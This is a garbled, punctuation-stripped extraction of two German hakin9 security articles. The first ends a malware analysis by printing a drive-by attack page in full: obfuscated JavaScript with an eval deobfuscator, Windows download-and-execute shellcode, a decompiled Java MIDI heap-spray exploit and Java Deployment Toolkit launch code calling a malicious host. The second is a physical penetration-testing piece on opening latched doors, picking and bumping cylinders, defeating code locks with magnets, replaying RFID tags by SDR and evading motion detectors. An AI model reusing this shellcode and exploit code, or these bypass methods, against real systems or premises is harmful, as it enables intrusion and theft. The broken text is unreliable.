Listing 3 Seite bdquohttparestyutecomsadhbdsa879321jbdasindexphprdquo (gekuumlrztes HTML Dokument)
ltbody id=greldm2gt
ltapplet archive=tmpdesjar code=devsAdgredY
width=462 height=255gt
ltparam name=data VALUE=httparestyute
comsadhbdsa879321jbdasl
phpdeserialize=6eampi=1gt
ltparam name=cc value=1gt
ltappletgt
ltbodygt
ltscriptgtvar cmjve3=dltiltih=A2F40Jy=soayQaUab0
=gioltgt~d55003c844047000000
000001000001100200000000000000000D
0035D4266064660005400D10030001A000-
0000410060A)(VcroltB=iillA0A50Cet
beseErsltEe 00000000000D01A
DD0001D100031400400D10084000000003
0060LHehJ)function jvfpb(blktgw)
return blktgwreplace(ig
)replace(~ig)replace(raquo
igStringfromCharCode(0x20x5))
replace(lt95gtigString
fromCharCode(0x2E0x2))
documentwrite(ltpgt1663ltpgt)var
ivypgs3=parseInt(document
getElementById(greldm2)
getElementsByTagName(String
fromCharCode(0x70))[parseInt(String
fromCharCode(0x30))]innerHTML)var
kwjse=for (cqdqdsc = ivypgs3
cqdqdsc gt 0 cqdqdsc--)for (gtkvdm
= ivypgs3-cqdqdsc gtkvdm lt= cmjve3
length gtkvdm=gtkvdm+ivypgs3)
kwjse=kwjse+cmjve3
charAt(gtkvdm)var
fnhld=kwjse+var isguhrd=jvfpb(fn
hld)eval(isguhrd)ltscriptgt
Listing 4a Verifikation der als Parameter uumlbergebenen URL bdquohttparestyutecomsadhbdsa879321jbdaslphpdeserialize=6eampi=1rdquo
public void init()
shellcode
String str2 = 505351525657559CE8000000005D83ED0D31C06
4034030780C8B400C8B701CAD8B4008EB0
98B40348D407C8B403C5657BE5E0100000
1EEBF4E01000001EFE8D60100005F5E89E
A81C25E010000526880000000FF954E010
00089EA81C25E01000031F601C28A9C356
302000080FB007406881C3246EBEEC6043
20089EA81C24502000052FF95520100008
9EA81C2500200005250FF9
5560100006A006A0089EA81C25E0100005289EA81C278020000526
A00FFD06A0589EA81C25E01000052FF955
A01000089EA81C25E01000052688000000
0FF954E01000089EA81C25E01000031F60
1C28A9C356E02000080FB007406881C324
6EBEEC604320089EA81C24502000052FF9
55201000089EA81C2500200005250FF955
60100006A006A0089EA81C25E010000528
9EA81C2A6020000526A00FFD06
A0589EA81C25E01000052FF955A0100009D5D5F5E5A595B58C3000
0000000000000000000000000000047657
454656D705061746841004C6F61644C696
272617279410047657450726F634164647
26573730057696E4578656300BB89F289F
730C0AE75FD29F789F931C0BE3C0000000
3B51B02000066AD03851B0200008B70788
3C61C03B51B0200008DBD1F020000AD038
51B020000ABAD03851B0200005
0ABAD03851B020000AB5E31DBAD5603851B02000089C689D751FCF
3A65974045E43EBE95E93D1E0038527020
00031F69666ADC1E00203851F02000089C
6AD03851B020000C3EB100000000000000
000000000000000000089851B020000565
7E858FFFFFF5F5EAB01CE803EBB7402EBE
DC355524C4D4F4E2E444C4C0055524C446
F776E6C6F6164546F46696C65410070646
67570642E65786500637261736
82E70687000
nops for the nop-slice
String str10 = 90909090
String java_version = SystemgetProperty(java
version)
url
String url = getParameter(data) applet method
int i = 0
int j = 0
while (urlcharAt(i) = )
j += urlcharAt(i)
i += 1
j += 7
j = 256
String checksum = IntegertoHexString(j)
checksum = 6e correct for the url
httparestyutecomsadhbdsa879321jbdasl
phpdeserialize=6eampi=1
if (urlindexOf(deserialize= + checksum) == -1)
return
10201014
FORTGESCHRITTENE
Zusaumltzlich wird noch das oben erwaumlhnte verschleierte JavaScript auf der urspruumlnglichen HTML-Seite geladen Dieses ist noch erstaunlicher denn es enthaumllt gleich ei-ne ganze Ladung von Exploits fuumlr Java Adobe Flash sowie Adobes PDF Reader bereit Der sbquoAuthorlsquo der Sei-te war auf houmlchste Kompatibilitaumlt aus denn auch hier werden nur bestimmte ndash vor allem neuere ndash Versionen der Browser Plugins unterstuumltzt (vgl Listing 5)
Unter httpwwwexploit-dbcomexploits12117 fin-det man eine Beschreibung der Schwachstelle Diese betrifft zusaumltzlich zum analysierten Applet die Java-Ver-sion 160_19
Zusammenfassend laumlsst sich feststellen dass Schadsoftware auf verschiedensten Wegen ins Sys-tem gelangen kann Es ist nicht mehr notwendig Programme zu installieren oder aumlhnliches Die hier beschriebene HTML-Datei koumlnnte auch in einem HTML-faumlhigen E-Mail-Client ausgefuumlhrt werden Ebenso kann die iFrame-Konstruktion in E-Mails platziert werden Es sind nicht nur einzelne Pro-gramme oder PlugIns fuumlr Browser betroffen son-dern es wird versucht gezielt neue Schwachstellen fuumlr mehrere populaumlre Programme zu finden was der letzte Ausschnitt des JavaScript-Codes zeigt Auch
Listing 4b Verifikation der als Parameter uumlbergebenen URL bdquohttparestyutecomsadhbdsa879321jbdaslphpdeserialize=6eampi=1rdquo
Object localObject1
Object localObject2
Object localObject4
Object localObject5
String str20
String str21
String str22
if ((((java_versionindexOf(160_11) = -1) ||
(java_versionindexOf(160_12) = -1) ||
(java_versionindexOf(160_13) = -1) ||
(java_versionindexOf(160_14) = -1) ||
(java_versionindexOf(160_15) = -1) ||
(java_versionindexOf(160_16) = -1) 1 0) amp
(urlindexOf(i=1) == -1 1 0)) = 0)
Java midi vulnerable see http
vreugdenhilresearchnl201005
java-midi-parse-vulnerabilities
for detailed explaination The author claims that it
was in java 160_19
localObject1 =
localObject1 = repeat( 303)
using windows no return
localObject2 = SystemgetProperty(osname)
toLowerCase()
if (((String)localObject2)indexOf(win) gt= 0)
localObject1 = repeat( 302)
else
return
the core of the vulnerable create a malicious url
and ask javas midiplayer to play
localObject1 = + (String)localObject1 +
ZZZZZZ
try
String str19 = url + 11
localObject4 =
for (int k = 0 k lt str19length() k++)
localObject4 = (String)localObject4 + Integer
toHexString(str19charAt(k))
while (((String)localObject4)length() 8 = 0)
localObject4 = (String)localObject4 + 26 0x26 =
amp
localObject4 = str2 + (String)localObject4
thismem = spray((String)localObject4 str10)
localObject5 = new URL((String)localObject1)
MidiSystemgetSequencer()
str21 =
MidiSystemgetSoundbank((URL)localObject5) lt-- put
in url here
str22 =
MidiSystemgetSequencer()
while (true)
Threadsleep(10L)
catch (Exception localException2)
Systemoutprintln(localException2)
Malware-Doppelschlag per JavaScript und JavaApplet
hakin9orgde 15
das Verbieten von JavaScript3 was moderne Ajax-basierte Internetseiten nahezu unbenutzbar macht haumltte auf das Laden des JavaApplets keine Auswir-kung
Wie kann man derartigen heterogenen Bedrohun-gen begegnen Das haumlufigste Einfallstor fuumlr Schad-software bleibt die E-Mail Also ist die Absicherung der E-Mail-Kommunikation der erste und wichtigs-te Schritt zur Sicherung des Systems Moderne An-ti-Spam und Anti-Virenprogramme sind in der Lage Massenmails mit gefaumlhrlichen Anhaumlngen zu erken-
nen bevor entsprechende Signaturen bereitstehen Weiterhin sollte der ausgehende E-Mail-Verkehr mit gleicher Sorgfalt auf Spam und Viren gepruumlft wer-den wie der eingehende Nur so kann man feststel-len ob man bereits ungewollt zum Spam- und Viren-versender geworden ist Am besten funktioniert dies mit einer ausgelagerten E-Mail-Sicherheitsloumlsung da der Anbieter meist von der Masse der empfangenen und analysierten E-Mails profitiert sprich Bedrohun-gen meist schneller erkennt als der einzeln agieren-de Mail-Server-Administrator Und letzen Endes gilt immer noch Oumlffnen Sie keine E-Mails oder Anhaumlnge von Unbekannten
httpde-wikipediaorgwikiJava_Virtual_Machine
fox
Listing 5 Codefragment des entschleierten JavaScript verdeutlicht das Potential
var fdata
var skd=u5350u5251u5756u9c55u00e8u0000u5d00
ued83 u6870u0070
var skd1=skd + u7468u7074 u0038u9000
var skd2=skd + u7468u7074 u0032u9000
function JAVASMB()
try
see httpwwwexploit-dbcomexploits12117 for
exploit description
var u = HTTP -J-jar -Jbittoramcomsmbold
avi httparestyutecom
sadhbdsa879321jbdaslphpi=2
none
if (windownavigatorappName == Microsoft Internet
Explorer)
try
var o = documentcreateElement(OBJECT)
oclassid = clsidCAFEEFAC-DEC7-0000-0000-
ABCDEFFEDCBA
olaunch(u)
catch (e)
var o2 = documentcreateElement(OBJECT)
o2classid = clsid8AD9C840-044E-11D1-B3E9-
00805F499D93
o2launch(u)
else
var o = documentcreateElement(OBJECT)
var n = documentcreateElement(OBJECT)
otype = applicationnpruntime-scriptable-
plugindeploymenttoolkit
ntype = applicationjava-deployment-toolkit
documentbodyappendChild(o)
documentbodyappendChild(n)
try
olaunch(u)
catch (e)
nlaunch(u)
catch (e)
IEPEERS()
IEPEERS()
JAVASMB()
MICHAEL PEICKEntwickler und Mitglied des eleven Research Teams
Penetration Testing im Jahre 2010
hakin9orgde 17
Im Jahr 2010 ist es kein Problem mehr ein Netzwerk vor Gefahren zu schuumltzen Firewall-Hardware gibt es mittlerweile zu erschwinglichen Preisen IT-System-
haumluser holen sich Sicherheitsexperten und richten mit deren Unterstuumltzung ein sicheres Netzwerk ein Mitar-beiter werden im Umgang mit der IT-Technik geschult sodass Phishing und Social Engineering Angriffe erfolg-los verlaufen IDS und IPS Systeme finden verdaumlchtige Aktivitaumlten im Netzwerk und zeigen diese dem Adminis-trator an Die IEEE 8021X Authentifizierung an Access Points und Netzwerkswitches verhindern den Zugang von unbekannten Computern zum Netzwerk Mit IEEE 8021Q (Virtual Local Area Network oder kurz VLAN) werden Netzwerke segmentiert obwohl alle Compu-ter hardwareseitig an einem Switch haumlngen Mit diesen Techniken ist man in der Lage ein Netzwerk sowohl vor Angriffen aus dem WAN als auch aus dem Inneren LAN zu schuumltzen ndash wuumlrde man meinen
Die RealitaumltIch wurde von einem mittelstaumlndischen Unternehmen engagiert einen Penetrationstest durchzufuumlhren Waumlh-rend der Footprinting-Phase habe ich sehr schnell er-kannt dass die IT-Sicherheit bei diesem Unternehmen ein sehr sensibles Thema ist Doch trotz fast paranoider Sicherheitsvorkehrungen ist es mir erfolgreich gelun-gen dem Unternehmen die Kundendaten zu entwen-den Zwar war IT-Technisch alles abgesichert der phy-sische Zugang zu den Daten war es allerdings nicht Die Eingangstuumlr des Unternehmens war wegen des
Kundenverkehrs nicht abgeschlossen Die Tuumlr zum Serverraum stand wohl wegen der Abwaumlrme sperran-gelweit offen im Schloss des Racks steckte der Schluumls-sel Es gab nichts und niemanden der mich davor ab-halten konnte aus jedem Server jeweils eine Festplatte einzustecken und blitzschnell das Gelaumlnde zu verlas-sen Weder der Geschaumlftsfuumlhrer noch die IT-Adminis-tration hat mit einem so dreisten und einfachen Angriff gerechnet
In dem folgenden Artikel werde ich die aktuelle Si-cherheitstechnik vorstellen und aufzeigen wie ein-fach diese Technik zerstoumlrungsfrei mit und fast spurlos uumlberlistet werden kann Dieser Artikel ist keine Anlei-tung wie man einbricht er soll lediglich die Schwach-stellen der heute massenhaft eingesetzten Systeme aufzeigen Aus diesem Grund habe ich mich bei den Beschreibungen kurz gefasst sowie einige Details weggelassen
Zugefallene TuumlrenWas ist eigentlich eine zugefallene Tuumlr Rund 95 al-ler Tuumlren haben heute ein Schloss mit einer Falle Wird die Tuumlr zugezogen faumlllt die Schlossfalle in die dafuumlr vorgesehene Oumlffnung des Schlieszligbleches in der Tuumlrz-arge Die Tuumlr laumlsst sich dann entweder mit dem Tuumlr-griff oder durch das drehen des Schlieszligzylinders wieder oumlffnen (wenn zB auf einer Seite ein Knauf statt eines Angriffes angebracht ist) Mit dem Schluumlssel reicht ei-ne halbe Umdrehung aus um die Tuumlr wieder zu oumlffnen Bei elektronischen Schlieszligsystemen erfolgt die Freiga-
Penetration Testing im Jahre 2010
Viele Administratoren uumlbersehen leider bei der Absicherung des Netzwerkes seine physikalische Sicherheit Die Bedrohung kommt nicht nur durch das Ethernet-Kabel
IN DIESEM ARTIKEL ERFAHREN SIE
werden koumlnnen
WAS SIE VORHER WISSENKOumlNNEN SOLLTEN
Dimitri Roschkowski
10201018
PRAXIS
Um so etwas zu verhindern bieten sich sogenannte Doppelfalztuumlren an (Abbildung 2) Diese Tuumlren haben einen zweiten Knick im Rahmen und Tuumlrblatt Eine an-gesetzte Oumlffnungsnadel kommt damit nicht mehr an die Schlieszligfalle ran und eine Oumlffnung wird damit verhindert Mit einer sogenannten bdquoMach Aufldquo Faltkarte laumlsst sich aber auch dieses Hindernis uumlberwinden
Damit eine Tuumlr mit diesen Techniken nicht geoumlffnet werden kann hilft es nur diese Tuumlr abzuschlieszligen Dabei wird mindestens ein Riegel in das Schlieszligblech geschoben der ohne Schluumlssel nicht mehr zuruumlckge-schoben werden kann Das Abschlieszligen einer Tuumlr mit Schluumlssel ist jedoch nicht komfortabel Diese Schwauml-che haben die Schlosshersteller erkannt und bie-ten selbstschlieszligende Schloumlsser an Diese Schloumls-ser schieben automatisch beim zufallen die Riegel in das Schlieszligblech Betaumltigt man die Tuumlrklinke wird gleichzeitig die Schlossfalle und die Riegel zuruumlckge-schoben die Tuumlr ist wieder offen Je nach Modell des Schlosses braucht man aber weiterhin eine bis zwei Umdrehungen mit dem Schluumlssel um diese Tuumlr zu oumlff-nen
Diese Schloumlsser sind allerdings nicht fuumlr Tuumlren ge-eignet die uumlber eine Elektronik geoumlffnet werden sol-len Hierfuumlr gibt es allerdings auch eine Loumlsung Es gibt Schloumlsser mit einer Elektronik und einem Elekt-romotor der dann bei einem entsprechenden Signal das Schloss aufschlieszligt und damit die Funktion eines Schluumlssels simuliert Allerdings sind solche Schloumlsser recht teuer
Lockpicking ndash Der Zylinder als AngriffszielEine weitere Schwachstelle einer Tuumlr ist der Zylinder Ein Laie kann nicht erkennen ob die Mechanik eines Zylinders sicher ist oder mit entsprechendem Werkzeug sekundenschnell uumlberlistet werden kann Fuumlr ihn zaumlhlt lediglich der Preis und die Logos auf der Verpackung um die Sicherheit beurteilen zu koumlnnen Hier gilt aller-dings ausnahmsweise der Grundsatz billig = schlechtteuer = gut wobei man dazu anmerken muss dass man die oberste Preiskategorie der Zylinder waumlhlen muss um tatsaumlchlich eine hohe Sicherheitsstufe her-stellen zu koumlnnen Dass man Zylinder oumlffnen kann liegt an der (Massen-)Herstellung dieser mechanischen Ge-raumlte Jedes Produkt weist gewisse Toleranzen auf je groumlszliger diese Toleranzen sind desto leichter laumlsst sich der Zylinder uumlberlisten
Wie Funktioniert ein SchlieszligzylinderEin Schlieszligzylinder besteht aus einem Gehaumluse (hell-grau) und einem Kern (dunkelgrau) Kernstifte (gelb) und Gehaumlusestifte (rot) verhindern dass der Kern ge-dreht werden kann Fuumlhrt man nun einen Schluumlssel in den Schlieszligkanal (weiszlig) ein druumlcken die Zaumlhne des Schluumlssels die Kernstifte herunter sodass der Uumlber-gang zwischen den Kernstiften und den Gehaumlusestif-
be dabei nicht an der Schlossfalle freigegeben sondern am Schlieszligblech
Wie laumlsst sich eine zugefallene Tuumlr oumlffnen Zugefallene Tuumlren lassen sich ganz einfach oumlffnen Schluumls-seldienste verwenden hierfuumlr Oumlffnungsnadeln (Abbildung 1) Diese Oumlffnungsnadeln werden in Houmlhe der Schlossfalle zwischen Tuumlrzarge und Tuumlrblatt angesetzt zieht man jetzt den hinteren Teil der Oumlffnungsnadel nach oben druumlckt der vordere Teil die Schlieszligfalle wieder ins Schloss zuruumlck ndash die Tuumlr ist damit offen Mit etwas Uumlbung dauert es nicht laumlnger als fuumlnf Sekunden um eine Tuumlr zu oumlffnen
Abbildung 2 Eine Oumlffnungsnadel an einer Doppelfalztuumlr
Abbildung 1 Zwei Saumltze Oumlffnungsnadeln
Penetration Testing im Jahre 2010
hakin9orgde 19
ten genau zwischen dem Kern und dem Gehaumluse ist In diesem Zustand laumlsst sich der Kern drehen und ein Schloss aufschlieszligen
Ich moumlchte hier drei Methoden vorstellen mit denen ein Schlieszligzylinder ohne Schluumlssel zerstoumlrungsfrei ge-oumlffnet werden kann Beim klassischen Handpicken geht es darum die Sperrstifte eines Schlosses so zu mani-pulieren dass diese den Kern freigeben Zunaumlchst wird ein Spanner in den Schlieszligkanal eingefuumlhrt und um ein paar Grad gedreht sodass ein minimaler Drehmoment auf die Sperrstifte wirkt Geht man jetzt mit einem Hand-pick die einzelnen Sperrstifte ab so laumlsst sich mit etwas Uumlbung erfuumlhlen welcher Stift gerade am meisten Wi-derstand bietet Druumlckt man diesen Stift mit dem Hand-pick herunter laumlsst sich der Kern ein kleines bisschen drehen sobald der der Gehaumlusestift den Kern verlas-sen hat Diesen Stift hat man jetzt gesetzt Nun sperrt ein anderer Sperrstift In einem normalen Schloss gibt es etwa fuumlnf solcher Stifte Hat man alle Stifte richtig gesetzt laumlsst sich der Kern drehen ist der Zylinder ist damit geoumlffnet
Eine weitere Methode um einen Schlieszligzylinder zu oumlffnen sind Schlagschluumlssel Ein Schlagschluumlssel ist ein spezieller aus Stahl gefertigter Schluumlssel der nur im Profil in einen Zylinder passt Die Zaumlhne des Schluumlssels wurden auf die tiefst moumlgliche Position gefraumlst auszliger-dem wurde der Anschlag des Schluumlssels um etwa ei-nen Millimeter verkuumlrzt sodass der Schluumlssel sich mit leichtem Druck etwas tiefer ins Schloss einfuumlhren laumlsst als vorgesehen Zum Oumlffnen des Zylinders fuumlhrt man den Schlagschluumlssel in den Zylinder ein und schlaumlgt an-schlieszligend mit einem flexiblen Hammer auf den Schluumls-sel Den Schlagimpuls uumlbertragen die Kernstifte auf die Gehaumlusestifte die dann nach unten gedraumlngt werden und damit den Kern freigeben Dreht man den Schlag-schluumlssel genau in diesem Moment (wenige Millisekun-den nach dem Schlag) laumlsst sich der Kern drehen und das Schloss oumlffnen
Die dritte Methode ist ein Elektro-Pick Ein Elek-tropick arbeitet nach dem gleichen Prinzip wie ein Schlagschluumlssel nur dass hier mehrere Schlaumlge pro Sekunde auf die Sperrstifte erfolgen Um einen Zylin-der mit dieser Methode zu oumlffnen fuumlhrt man die Na-del des Elektro-Picks sowie einen Spanner (entwe-der einen normalen oder einen Drehspanner) in den Schlieszligkanal ein und schaltet den Pick ein Anstatt den Pick durchgehend laufen zu lassen empfiehlt es sich ihn in kurzen Sequenzen ein- und auszuschalten Sind die Sperrstifte in passender Position laumlsst sich der Kern drehen
Bei allen drei vorgestellten Oumlffnungsmethoden hat man bei abgeschlossenen Schloumlssern immer ein Pro-blem Hat man einen Zylinder um 360deg gedreht druuml-cken die Federn die Gehaumlusestifte wieder in den Kern und man muumlsste den Zylinder erneut oumlffnen (picken) Um das zu verhindern ndash und damit stelle ich das letz-
te Werkzeug meiner Sammlung vor ndash benutzt man das bdquoFlip-Itldquo Werkzeug Dieses Werkzeug nutzt die physika-lische Traumlgheit aus indem der Zylinder so schnell dreht wird dass die Federn es nicht schaffen die Stifte in den Kern zu druumlcken Dazu spannt man den bdquoFlip-Itldquo erst einmal in der Richtung vor in der der Zylinder gedreht werden soll dann fuumlhrt man es in den Schlieszligkanal ein und druumlckt den Ausloumlser Der Zylinder wird dann uumlber die oberste Position gedreht und man kann das Schloss weiter oumlffnen
Man benoumltigt viel Uumlbung um einen Zylinder ohne Schluumlssel oumlffnen zu koumlnnen Denn macht man es mit Gewalt kann die Mechanik im inneren beschaumldigt wer-den Dann laumlsst sich das Schloss nicht einmal mit dem richtigen Schluumlssel oumlffnen
Sichere SchlieszligzylinderSichere Schlieszligzylinder gibt es in meinen Augen nicht Je nachdem welchen Aufwand und Kosten man auf sich nimmt wird man in der Lage sein alle Zylinder zu um-gehen Einen aus meiner Sicht relativ sicheren Zylin-der bietet die Firma EVVA mit dem MCS (Magnet Code System) an Statt normaler Stifte arbeitet dieser Zylin-der mit insgesamt acht Magnetrotoren Wird ein Schluumls-
Abbildung 4 Werkzeugsatz zur zerstoumlrungsfreien Oumlffnung von Schloumlssern
Abbildung 3 Ein Schlieszligzylinder im Querschnitt Links ist der Zylinder abgeschlossen rechts offen (Bildquelle Wikipediade)
10201020
PRAXIS
sel mit richtiger Magnet-Codierung eingefuumlhrt werden die Rotoren in die Schlieszligposition gebracht und der Zylinder laumlsst sich drehen Zusaumltzlich kann ein solcher Zylinder mit einer Elektronik auf RFID Basis ausgestat-tet werden Zusaumltzlich zum Magnetcode wird noch ei-ne elektronische Authentifizierung durchgefuumlhrt bevor dieser Zylinder trotz des richtigen Schluumlssels gedreht werden kann So koumlnnen zB verlorene Schluumlssel ge-sperrt werden oder um Mitarbeitern den Zutritt nur zu bestimmten Zeiten zu gestatten
CodeschloumlsserCodeschloumlsser sind in der Regel zugefallene Tuumlren und lassen sich am einfachsten mit den bereits oben vor-gestellten Methoden oumlffnen In diesem Artikel moumlchte ich aber auf eine weitere Schwachstelle hinweisen Die Abbildung 5 zeigt ein typisches Codeschloss anhand des Zylinders auf der rechten Seite kann jeder darauf schlieszligen wie groszlig die Code-Tasten dieses Schlosses in der Realitaumlt sind Wuumlrde man eine Codeeingabe fil-men koumlnnte man anhand der langen Handbewegun-gen auf den Code schlieszligen koumlnnen
Diese Schwachstelle laumlsst sich aber ganz einfach schlieszligen indem man den Eingabetasten die Ziffern fuumlr jede Codeeingabe per Zufallsgenerator zuweist Das bedeutet dass die obere linke Taste nicht permanent die Ziffer 1 eingibt sondern bei jeder Codeeingabe ei-ne andere Durch diese zufaumlllige Anordnung der Zif-fern auf den Tasten laumlsst sich nicht mehr anhand der Handbewegung feststellen welche Ziffer eingegeben wurde Umsaumltzen laumlsst sich eine solche Eingabetech-nik mit Siebensegmentanzeigen oder mini-OLED-Bild-schirmen unter durchsichtigen Tasten bzw mit einem Touchscreen
In Indoor-Bereich trifft man vor einigen Raumlumen auf eine einfachere Version von Codeschloumlssern Bei die-sen Schloumlssern liegt das Eingabeterminal direkt am Schloss an die Energieversorgung erfolgt uumlber Bat-terien Im geschlossenen Zustand laumlsst sich die Tuumlr-klinke ohne Funktion herunterdruumlcken Gibt man den richtigen Code ein wird ein Elektromagnet mit Strom versorgt und Zieht einen Stift an der die Tuumlrklinke mit dem Schloss verbunden Betaumltigt man jetzt die Tuumlrklin-ke so laumlsst sich die Tuumlr oumlffnen Da die Batterien in ei-nem solchen Schloss moumlglichst lange halten sollen arbeiten die Schloumlsser mit einem recht geringen Ma-gnetfeld Dieses Magnetfeld kann man jedoch mit ei-nem von auszligen angebrachten starken Magneten (sie-he auch Abschnitt uumlber Reed-Relais) simulieren und so das Schloss oumlffnen Im Uumlbrigen lassen sich mit einem starken Magneten auch einige aumlltere elektronische Zy-linder oumlffnen
Schlieszligsysteme mit RFID-TagsRFID steht fuumlr radio frequency identification also fuumlr die Identifikation uumlber Funkwellen Diese Technik
Abbildung 6 Ein Elektronisches Codeschloss an einer Gegensprechanlage
Abbildung 5 Ein EVVA-MCS Schluumlssel
Penetration Testing im Jahre 2010
hakin9orgde 21
ist heute sowohl bei Unternehmen als auch in Pri-vathaumlusern (Autoschluumlssel Funk-Garagentoroumlffner) sehr verbreitet und wegen des Komforts beliebt Im Wesentlichen besteht das System aus zwei Kompo-nenten einem RFID Lesegeraumlt und den sogenannten Tags Mit den Tags koumlnnen sich die Zugangsberech-tigten Personen am Lesegeraumlt identifizieren Unab-haumlngig davon ob das Tag aktiv (mit einer eigenen Energieversorgung) oder passiv (die notwendige Energie liefert das Lesegeraumlt) ist wird der Identifi-kationsvorgang vom Tag eingeleitet In den einfach-sten Faumlllen sendet das Tag unverschluumlsselt die eige-ne Seriennummer oder einen vorher eingespeicher-ten Code das Lesegeraumlt empfaumlngt den Code und uumlberpruumlft ob die Seriennummer oder der Code zu-gangsberechtigt ist In den wenigsten Faumlllen erfolgt eine zusaumltzliche Kryptographische Authentifizierung des Tags die aber wegen der geringen Rechenka-pazitaumlt und Energieversorgung sehr einfach ausfaumlllt
Wie kann man solche Systeme uumlberlisten Das Zauberwort dazu lautet bdquoSoftware Defined Ra-dioldquo (SDR) Mit einem SDR Tranceiver ist man in der Lage die Kommunikation zwischen dem Tag und dem Lesegeraumlt aufzuzeichnen und auf einem Rech-ner zu analysieren Anschlieszligend sendet man die aufgezeichneten und eventuell bearbeiteten Daten an das Lesegeraumlt
Wie laumluft ein solcher Angriff ab Zunaumlchst einmal muss man herausfinden auf wel-cher Frequenz die Kommunikation zwischen dem Le-segeraumlt und den Tags erfolgt Dazu kann man uumlber den Herstellernamen des Lesegeraumltes und seinem Produkt-Portfolio gehen oder einfach verschiedene Tags ausprobieren Wenn ein Tag mit dem einge-setzten Lesegeraumlt nicht kompatibel ist erfolgt keine Reaktion Wird dem Tag der Zugang verweigert so zeigt das Lesegeraumlt dies in der Regel an Dann wird ein SRD Tranceiver benoumltigt der auf der benoumltigten Frequenz arbeitet Dazu verwende ich den USRPUSRP2 Tranceiver mit einem passenden Daughter-board und einer Richtantenne (700$1400$ + 275$ + 100$) Der Vorteil dieses Universalsystems liegt daran dass man mit verschiedenen Daughterboard unterschiedliche Frequenzen abdecken kann Die Richtantenne richtet man dann etwas seitlich auf das Lesegeraumlt aus und faumlngt mit der Aufzeichnung der Daten in dem Frequenzbereich an Bei Long Range Tags (das Tag kann mehrere Meter vom Lesegeraumlt entfernt sein) reicht bei Unverschluumlsselten Systemen - wegen der houmlheren Sendestaumlrke - die Aufzeichnung einer Kommunikation aus Passive Tags wie RFID Karten senden ein viel schwaumlcheres Signal deshalb sind die Aufzeichnungen oft gestoumlrt In der Regel be-noumltigt man fuumlnf bis zehn Aufzeichnungen um ein Mus-
Abbildung 8 Eine Uumlberwachungskamera hat eine Veraumlnderung im Bild detektiert Der veraumlnderte Bildausschnitt wird in einem Rahmen angezeigt
Abbildung 7 Das Lesegeraumlt reagiert auf eine Mifare-Classic Karte und lehnt den Zugang ab
10201022
PRAXIS
ter zu finden Der Anfang der Uumlbertragung ist immer gleich in der Mitte gibt es einen variablen Bereich und das Ende ist bei allen Aufzeichnungen ebenfalls gleich Damit ein Lesegeraumlt nun dem virtuellen Tag den Zugang gewaumlhrt saumlubert man zunaumlchst einmal die Aufzeichnungen mit einigen Filtern GNU-Radio bietet hierfuumlr zahlreiche Moumlglichkeiten Dann stellt man sich aus mehreren Aufzeichnungen ca drei moumlglichst ideale (hier braucht man etwas Erfahrung ein gutes Auge und etwas Fingerspitzengefuumlhl) Kom-munikationen zusammen und sendet diese an das Lesegeraumlt Mindestens eine dieser Aufzeichnungen wird dann das Lesegeraumlt akzeptieren und dem An-greifer den Zugang gewaumlhren
Aus der Praxis kann ich sagen dass etwa 90 al-ler RFID-Karten-Systeme sich nur mit der Serien-nummer des Tags zufrieden geben Aumlltere Garagen-toroumlffner arbeiten mit einem statischen Code Neuere Garagentoroumlffner und einige Autohersteller nutzen ei-nen Rolling Code um den Nutzer zu identifizieren Im Maumlrz 2008 wurde auch dieses System von Forschern der Ruhr-Universitaumlt Bochum geknackt Zwei aufge-zeichnete Kommunikationen genuumlgen bereits fuumlr ei-ne Seitenkanalattacke Ebenfalls wurde im Jahr 2008 die Verschluumlsselung des Mifare-Systems per Rever-se Engineering geknackt Solche Verschluumlsslungen verlangsamen nur den Angriff und machen ihn teurer
Gibt es auch sichere RFID-Systeme Die gibt es durchaus Hier verwendet man eine asymmetrische Verschluumlsselung Fuumlr jedes zugangs-
berechtigte Tag wird ein privater und ein oumlffentlicher Schluumlssel erzeugt Der private Schluumlssel wird in einer Datenbank gespeichert auf die das Lesegeraumlt zu-greifen kann Der oumlffentliche Schluumlssel wird auf dem Tag gespeichert Die Identifizierung erfolgt dann in mehreren Schritten Wie oben bereits beschrieben faumlngt das Tag mit der Identifikation an indem es dem Lesegeraumlt seine Seriennummer mitteilt Das Lesege-raumlt generiert daraufhin eine Zufallszahl und sendet diese mit der Seriennummer des Tags wieder zuruumlck (Da die Kommunikation uumlber Funk erfolgt kann es sein dass zur gleichen Zeit mehrere RFID Tags aktiv sind Deshalb muss man waumlhrend der Kommunikati-on stets angeben fuumlr welchen Empfaumlnger eine Nach-richt bestimmt ist) Das Tag empfaumlngt die Nachricht verschluumlsselt diese mit dem oumlffentlichen Schluumlssel und sendet sie an das Lesegeraumlt zuruumlck Kann das Lesegeraumlt die empfangene Nachricht mit dem priva-ten Schluumlssel des Tags entschluumlsseln und stimmt die Nachricht mit der Zufallszahl uumlberein wird der Zu-gang gewaumlhrt
BewegungsmelderBewegungsmelder verwenden fuumlr die Bewegungsde-tektion Passiv Infrarot Sensoren (PIR) Jedes Objekt emittiert eine Waumlrmestrahlung ein PIR Sensor kann diese Strahlung messen Um Bewegungen detektieren zu koumlnnen wird der Sensor mit Buumlndellinsen in Be-reiche aufgeteilt Aumlndert sich die einfallende Strahlung in einem Bereich um einen bestimmten Schwellwert wird dies als Bewegung interpretiert Der Schwellwert sorgt auszligerdem dafuumlr dass statische Temperaturver-aumlnderungen der Umgebung nicht als Bewegung ge-deutet werden Diese Funktionsweise ist leider Fehler-anfaumlllig so kann zB ein kalter Luftstrom bereits einen Bewegungsmelder ausloumlsen Hierfuumlr setzen bessere Bewegungsmelder (Dualmelder) zusaumltzlich noch ei-nen Ultraschall-Sensor ein Nur wenn beide Sensoren ausloumlsen wird eine Bewegung gemeldet Damit sol-len Fehlalarme verhindert werden VdS-Anerkannte Bewegungsmelder die in Alarmanlagen verwendet werden loumlsen zusaumltzlich Alarm aus wenn diese ab-gedeckt werden
Wie kann man Bewegungsmelder uumlberlisten Je groumlszliger die Entfernung zu dem PIR Sensor ist des-to weniger nimmt eine Veraumlnderung Einfluss auf die einfallende Infrarotstrahlung in einem Bereich Auch haben Gegenstaumlnde mit gleicher Waumlrmestrahlung kei-nen Einfluss auf die Sensoren Einen Bewegungsmel-der (auch einen Dualmelder) kann man deshalb mit ei-nem Tuch uumlberlisten Zunaumlchst laumlsst man das Tuch im uumlberwachten Raum einige Minuten liegen damit es die Temperatur der Umgebung annimmt Wenn man sich jetzt in dieses Tuch einhuumlllt und seitwaumlrts mit dem Ruuml-cken zum Bewegungsmelder langsam an diesem vor-
Abbildung 9 Eine Buumlroklammer ist an einer Schnurr befestigt Selbst bei einem Abstand von 35cm ist das Magnetfeld noch so stark dass die Buumlroklammer in der Luft haumlngt
